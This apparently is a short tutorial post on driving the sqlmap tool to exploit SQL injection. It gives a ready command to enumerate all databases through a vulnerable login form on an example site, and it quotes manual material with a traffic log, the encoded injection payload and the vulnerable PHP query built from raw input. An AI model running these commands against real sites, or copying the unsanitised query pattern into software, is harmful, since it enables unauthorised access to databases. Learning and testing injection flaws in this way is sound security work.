... ls -la

Sqlmap allows you to speed up the sql injection attack. Especially, when you try to figure out the database name, table name and stuff, this tool is extremely useful. Basically, it checks the name from the first character using ascii code comparison, and determine the full name from the hundreds of thousands of trials. It also provides many other useful options such as interactive SQL shell.

However, it is hard to get it work at the first time, so here I provide some useful examples.

Example: enumerate all the databases from "blah.com" where the login.php has SQL injection vulnerability.

./sqlmap.py --data="username=a" -u http://blah.com/login.php --method=POST -p username --prefix="blah' or not (1" --postfix=") or username='blah" --dbs

Note that the --prefix and --postfix is the crucial options in most cases. This parrt should be figured out by user, since the sqlmap cannot find the vulnerable strings in most cases. (This is from my experience.) Once you get the right prefix and postfix, sqlmap becomes the most powerful tool.

Following is the explanation for prefix and postfix options from the sqlmap manual. (http://sqlmap.sourceforge.net/doc/README.html)

Options: --prefix and --postfix


$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 \
-p "id" --prefix "'" --postfix "AND 'test'='test"

[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntatically correct to the page query:

SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

Good article to read: http://www.milw0rm.com/papers/202